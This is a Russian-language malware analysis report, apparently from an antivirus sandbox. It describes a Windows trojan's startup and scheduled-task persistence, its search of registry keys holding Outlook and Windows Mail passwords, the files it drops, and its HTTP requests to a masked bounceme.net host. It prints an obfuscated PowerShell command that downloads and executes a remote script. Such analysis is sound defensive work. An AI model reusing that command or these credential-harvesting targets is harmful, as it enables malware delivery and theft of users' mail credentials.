Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\_jcrved6_.lnk
- <SYSTEM32>\tasks\_jcrved6_
Вредоносные функции
Ищет ветки реестра, отвечающие за хранение паролей сторонними программами
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook]
- [<HKCU>\Software\Microsoft\Internet Account Manager]
- [<HKLM>\Software\Microsoft\Windows Mail]
- [<HKCU>\Software\Microsoft\Windows Mail]
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\_jcrved6_\_jcrved6_.zip
- C:\users\public\_jcrved6_\exe.png
- C:\users\public\_jcrved6_\jli.dll
- C:\users\public\_jcrved6_\msvcr100.dll
- C:\users\public\b.r
- %TEMP%\outlook logging\firstrun.log
- %WINDIR%\inf\outlook\outlperf.h
- %WINDIR%\inf\outlook\0009\outlperf.ini
Перемещает следующие файлы
- C:\users\public\_jcrved6_\exe.png в C:\users\public\_jcrved6_\_jcrved6_.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://he###.bounceme.net/_0s9_3y1_2V2_8OLImx/_0s9_3y1_2V2_8OLI/_0s9_3y1_2V2_8OLIal/_0s9_3y1_2V2_8OLI
- http://he###.bounceme.net/_0s9_3y1_2V2_8OLImx/_0s9_3y1_2V2_8OLIMD/_0s9_3y1_2V2_8OLIal/md.zip
UDP
- DNS ASK he###.bounceme.net
Другое
Ищет следующие окна
- ClassName: 'mspim_wnd32' WindowName: 'Microsoft Outlook'
- ClassName: 'rencat' WindowName: ''
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" echo ieX("Ie`X`(N`ew-oBJ`e`Ct N`et.`Web`ClIeNt`).DOwnlOa`d`StRIN`G('http://he###.bounceme.net/_0s9_3y1_2V2_8OLImx/_0s9_3y1_2V2_8OLI/_0s9_3y1_2V2_8OLIal/_0s9_3y1_2V2_8OLI')"); "
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -win 1 -
- '%ProgramFiles%\microsoft office\office14\outlook.exe' -Embedding
